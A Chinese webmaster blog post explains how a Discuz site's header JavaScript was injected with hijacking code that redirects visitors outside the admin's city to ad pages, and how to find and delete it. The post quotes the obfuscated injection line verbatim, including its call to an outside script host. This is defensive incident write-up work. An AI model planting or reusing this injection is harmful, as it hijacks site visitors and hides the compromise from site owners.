当前位置:首页 > 网站运营 > 正文内容

discuz网站被挂马,非管理员访问自动跳转到广告页面 怎么解决

葱子7年前 (2017-04-27)网站运营1742

你是否遇到过你的网站打开一会就自动跳转到其他页面,而且这个问题是你的用户告诉你的,而你自己却没有遇到?

discuz挂马弹出页面

经过葱子我细心的对挂马网站做排查,终于让我找到了问题所在。

挂马者是通过在discuz的头部js文件里面添加了劫持js代码,通过判断访问者的IP来实现不同跳转的。

具体代码如下:

document.write(“<\163”+”cript src=’http://\141”+”d.\172”+”om”+”12\63”+”.n”+”et/i”+”p.asp?l”+”oc=chengdu’><\/s”+”cript>”);

可以看出,后面有个“chengdu”代码,这段代码的意思就是IP为成都地区的访问者在访问被挂马页面时不做跳转。其余地区的IP访问者则跳转。

从这段代码我们就可以看出挂马者是多么的用心险恶。

他首先根据你网站所在地进行判断网站管理员经常使用的IP地址所在地,然后有针对性的对网站管理员不做跳转劫持。

所以,这种劫持的情况下,网站管理者非常难以发现到网站被挂马了。

解决办法也比较简单:

首先校验下原始文件,对比下哪些js文件近期有被改动过,然后针对被改动过的js文件做以上代码段的排除。找到以上代码段后,删除即可。

最后说一下,各位网站管理者一定要注意保管好网站和服务器的管理密码,尽量设置的复杂一点。同时也要及时检测服务器是否存在漏洞等,及时做针对性处理,以避免类似的事情再发生。

以上文章为向上的葱子原创,转载请注明出处。

原文地址:https://www.aitiancheng.com/article-491.html

扫描二维码推送至手机访问。

版权声明:本文由葱子博客发布,如需转载请注明出处。

本文链接:https://www.aitiancheng.com/article-491.html

相关文章

windows server2008服务器安装一键php环境包

windows server2008服务器安装一键php环境包

最近在阿里云购买了一台Windows server2008的ECS服务器,准备在这上面安装一个php环境来运行discuz网站。 windows系统下,一般是使用IIS(7.0/7.5)作为web服务器。 所以为了安装php环境包...

windows server2008中用IIS7.0新建网站

windows server2008中用IIS7.0新建网站

上一篇文章我们安装好了php运行环境,这里我就开始新建网站。 第一步:首先打开IIS,选择“网站”,然后右键添加网站 第二步:配置网站信息 IIS中对网站进行配置,主要...

苹果ATS特性服务器配置指南

苹果ATS特性服务器配置指南

  配置指南: 需要配置符合PFS规范的加密套餐,目前推荐配置:ECDHE-RSA-AES128-GCM-SHA256:ECDHE:ECDH:AES:HIGH:!NULL:!aNULL:!MD...

详解WDCP3.2.8自动配置HTTPS功能

详解WDCP3.2.8自动配置HTTPS功能

wdcp最新版3.2.8已经支持在后台直接配置HTTPS了,不过很多站长似乎不太会使用这个功能。 下面我就简单的给大家讲解下如何使用这个功能: 一、新建网站 在wdcp...

案例分享:网站被植入projectpoi挖矿脚本导致CPU100%的解决办法

案例分享:网站被植入projectpoi挖矿脚本导致CPU100%的解决办法

最近在帮北安味道的站长排查他网站的问题:访问他网站后,浏览网站的电脑CPU使用将达到100%。   猜想应该是网页上被植入了恶意的js文件。 通过使用F12排查异常js文件发现,有个叫做projectpoi.m...

”site域名后提示“危险网站”怎么办?这才是正确的解决姿势!

”site域名后提示“危险网站”怎么办?这才是正确的解决姿势!

站长们在使用site命令查询网站信息时会出现“危险网站”提示,这到底是怎么回事呢?又该如何解决? 一、为什么会提示“危险网站” 针对这个问题,百度方面表示,百度云加速使用的漏洞扫描器是企业级别扫描器,对站点安全要求更...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。